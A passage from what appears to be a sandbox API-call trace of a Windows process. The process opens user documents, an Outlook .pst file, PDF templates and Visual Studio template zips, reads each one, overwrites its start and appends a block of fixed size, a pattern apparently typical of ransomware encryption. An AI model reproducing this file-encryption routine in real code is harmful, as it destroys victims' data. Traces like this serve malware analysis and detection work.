dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0060.301] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.301] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3b8 [0060.301] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.301] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.301] ReleaseMutex (hMutex=0x168) returned 1 [0060.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Settings.zip", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0060.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Settings.zip", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Settings.zip", lpUsedDefaultChar=0x0) returned 12 [0060.301] ReadFile (in: hFile=0x1ac, lpBuffer=0x26afbc8, nNumberOfBytesToRead=0x3b8, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26afbc8*, lpNumberOfBytesRead=0x2b1f2bc*=0x3b8, lpOverlapped=0x0) returned 1 [0060.303] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0060.304] WriteFile (in: hFile=0x1ac, lpBuffer=0x1ebf2f8*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2f8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x940, lpOverlapped=0x0) returned 1 [0060.304] CloseHandle (hObject=0x1ac) returned 1 [0060.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0060.457] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.457] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x24d [0060.457] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.466] ReleaseMutex (hMutex=0x168) returned 1 [0060.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Class.zip", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0060.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Class.zip", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class.zip", lpUsedDefaultChar=0x0) returned 9 [0060.501] ReadFile (in: hFile=0x1bc, lpBuffer=0x1f64528, nNumberOfBytesToRead=0x24d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f64528*, lpNumberOfBytesRead=0x2b1f2bc*=0x24d, lpOverlapped=0x0) returned 1 [0060.503] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0060.503] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x7d5, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7d5, lpOverlapped=0x0) returned 1 [0060.503] CloseHandle (hObject=0x1bc) returned 1 [0060.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0060.506] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.506] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x24f [0060.506] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.506] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.507] ReleaseMutex (hMutex=0x168) returned 1 [0060.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Module.zip", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Module.zip", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module.zip", lpUsedDefaultChar=0x0) returned 10 [0060.507] ReadFile (in: hFile=0x1bc, lpBuffer=0x1f64528, nNumberOfBytesToRead=0x24f, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f64528*, lpNumberOfBytesRead=0x2b1f2bc*=0x24f, lpOverlapped=0x0) returned 1 [0060.508] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0060.508] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x7d7, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7d7, lpOverlapped=0x0) returned 1 [0060.509] CloseHandle (hObject=0x1bc) returned 1 [0060.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0060.510] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.510] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x42400 [0060.510] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.511] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.511] ReleaseMutex (hMutex=0x168) returned 1 [0060.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="voeimd@djhreuu.uhd.pst", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0060.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="voeimd@djhreuu.uhd.pst", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="voeimd@djhreuu.uhd.pst", lpUsedDefaultChar=0x0) returned 22 [0060.511] ReadFile (in: hFile=0x1bc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0060.515] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x41400 [0060.515] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec3308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec3308*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.516] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x41400 [0060.516] WriteFile (in: hFile=0x1bc, lpBuffer=0x26b4038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4038*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.943] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0060.944] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0060.944] CloseHandle (hObject=0x1bc) returned 1 [0060.982] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Wbh-rxLyXar3C5.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wbh-rxlyxar3c5.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0060.983] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.983] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1f92 [0060.983] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.983] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.983] ReleaseMutex (hMutex=0x168) returned 1 [0060.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wbh-rxLyXar3C5.xlsx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0060.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wbh-rxLyXar3C5.xlsx", cchWideChar=19, lpMultiByteStr=0x1f8867c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wbh-rxLyXar3C5.xlsx", lpUsedDefaultChar=0x0) returned 19 [0060.983] ReadFile (in: hFile=0x1c4, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1f92, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2b1f2bc*=0x1f92, lpOverlapped=0x0) returned 1 [0060.984] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0060.984] WriteFile (in: hFile=0x1c4, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x251a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x251a, lpOverlapped=0x0) returned 1 [0060.985] CloseHandle (hObject=0x1c4) returned 1 [0060.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VhIBg8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vhibg8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0060.991] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.991] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x8b5f [0060.991] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.991] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.991] ReleaseMutex (hMutex=0x168) returned 1 [0060.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VhIBg8.docx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VhIBg8.docx", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VhIBg8.docx", lpUsedDefaultChar=0x0) returned 11 [0060.991] ReadFile (in: hFile=0x1c4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.992] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7b5f [0060.992] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.992] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7b5f [0060.992] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.993] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0060.993] WriteFile (in: hFile=0x1c4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.993] CloseHandle (hObject=0x1c4) returned 1 [0060.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eN5m2wE7n b.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\en5m2we7n b.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0060.995] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.995] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe7cd [0060.995] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0060.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0060.995] ReleaseMutex (hMutex=0x168) returned 1 [0060.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eN5m2wE7n b.odt", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0060.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eN5m2wE7n b.odt", cchWideChar=15, lpMultiByteStr=0x1f732cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eN5m2wE7n b.odt", lpUsedDefaultChar=0x0) returned 15 [0060.996] ReadFile (in: hFile=0x1c4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0060.997] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xd7cd [0060.997] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0060.997] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xd7cd [0060.997] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0060.998] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0060.998] WriteFile (in: hFile=0x1c4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0060.998] CloseHandle (hObject=0x1c4) returned 1 [0061.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.000] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.000] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x11ff6 [0061.000] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.000] ReleaseMutex (hMutex=0x168) returned 1 [0061.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.001] ReadFile (in: hFile=0x1c4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.018] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x10ff6 [0061.018] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.018] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x10ff6 [0061.018] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.019] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0061.019] WriteFile (in: hFile=0x1c4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.019] CloseHandle (hObject=0x1c4) returned 1 [0061.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.021] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.021] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x106ec [0061.022] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0061.022] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.022] ReleaseMutex (hMutex=0x168) returned 1 [0061.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7324c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.022] ReadFile (in: hFile=0x1c4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.073] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xf6ec [0061.073] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.095] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, 